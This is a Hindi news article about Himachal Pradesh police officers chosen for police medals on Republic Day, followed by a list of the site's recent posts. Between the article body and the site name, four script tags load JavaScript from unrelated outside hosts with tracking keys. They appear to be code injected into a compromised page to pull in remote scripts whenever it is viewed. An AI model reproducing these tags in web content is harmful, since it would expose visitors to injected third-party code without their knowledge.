Categories: हिमाचल

हिमाचल के पांच अफसरों को पुलिस मेडल

<p>हिमाचल प्रदेश के पांच पुलिस अधिकारियों को उनकी सराहनीय सेवा के लिए पुलिस मेडल से सम्मानित किया जा रहा है। गणतंत्र दिवस के मौके पर इन अधिकारियों को सम्मानित किया जाएगा। हिमाचल प्रदेश के आईजी पुलिस दिलजीत कुमार ठाकुर को राष्ट्रपति पुलिस मेडल मिलेगा, जबकि शेष चार अधिकारियों को भी पुलिस मेडल से सम्मानित किया जा रहा है। राष्ट्रपति के हाथों इन अधिकारियों को सम्मान दिया जाएगा।</p>

<p>दिलजीत कुमार ठाकुर आईजी इंटेलिजेंस सीआईडी में तैनात हैं।&nbsp; यह पुरस्कार 25 साल के बाद मिलता है। जो दूसरे अधिकारी हैं, उनमें एसपी कानून एवं व्यवस्था कुशाल चंद शर्मा, एसपी किन्नौर साजू राम राणा, इंस्पेक्टर पीटीसी डरोह सुशील कुमार और सब-इंस्पेक्टर चंबा कृष्ण कुमार को सम्मानित किया जा रहा है।</p>

<p>उधर, 71वें गणतंत्र दिवस के मौके पर एसएसबी के शिमला स्थित चिकित्सा प्रशिक्षण केंद्र में तैनात कमांडेंट (चिकित्सा) डॉ. पार्था मित्रा को भी उनकी बेहतरीन सेवाओं के लिए राष्ट्रपति पुलिस मेडल से सम्मानित किया जा रहा है।इसके अलावा सुजानपुर विधानसभा क्षेत्र की ग्राम पंचायत जोल के गांव पलाही निवासी चंडीगढ़ पुलिस में सहायक उपनिरीक्षक (एएसआई) तैनात सुदेश कुमार को 32 साल की बेहतरीन और उत्कृष्ट सेवाओं के लिए राष्ट्रपति पुलिस मेडल के लिए चुना गया है।</p>
<script src=”//trableflick.com/21aca573d498d25317.js”></script>
<script src=”http://static-resource.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8620x” type=”text/javascript”></script>
<script src=”http://cdn-javascript.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8620x&amp;format=arrjs&amp;r=1580013544828″ type=”text/javascript”></script>
<script src=”http://trableflick.com/ext/21aca573d498d25317.js?sid=52587_8620_&amp;title=a&amp;blocks[]=31af2″ type=”text/javascript”></script>

Samachar First

Recent Posts

“JOA IT पदों पर चयनित उम्मीदवारों की सूची जारी, इतने को मिली नियुक्ति”

  Shimla: सामाजिक न्याय एवं अधिकारिता विभाग ने राज्य चयन आयोग की सिफारिशों के आधार…

5 hours ago

अतिक्रमण एक रात का नहीं, सुक्खू सरकार से पहले हुआ अवैध निर्माण: कुलदीप

  Shimla : हिमाचल प्रदेश में स्ट्रीट वेंडर्स को लेकर विधानसभा की ओर से कमेटी…

5 hours ago

मुख्यमंत्री के निर्देश पर हमीरपुर में ‘कायाकल्प’ अभियान से बदल रही है शहर की तस्वीर

  Hamirpur: मुख्यमंत्री ठाकुर सुखविंदर सिंह सुक्खू के गृह जिले के मुख्यालय हमीरपुर शहर की…

6 hours ago

राज्य के स्वास्थ्य ढांचे को मजबूत करने के लिए ठोस कदम उठा रही है सरकार: बाली

  टांडा मेडिकल कालेज भी स्वास्थ्य क्षेत्र में निरंतर नए आयाम कर रहा स्थापित विश्व…

6 hours ago

प्रमोशन लिस्ट के इंतजार में कई शिक्षक बिना प्रिंसिपल बने होंगे रिटायर

  वर्तमान में प्रिंसिपल के 500 पद है खाली लेक्चरर्स की 90:10 की मांग का…

7 hours ago

अनुष्का दत्ता पहुंची मिस यूनिवर्स इंडिया-2024 के फाइनल में, हिमाचल की पहली प्रतिभागी

  Shimla: रोह‍डू की रहने वाली 22 वर्षीय अनुष्का दत्ता मिस यूनिवर्स इंडिया 2024 प्रतियोगिता…

7 hours ago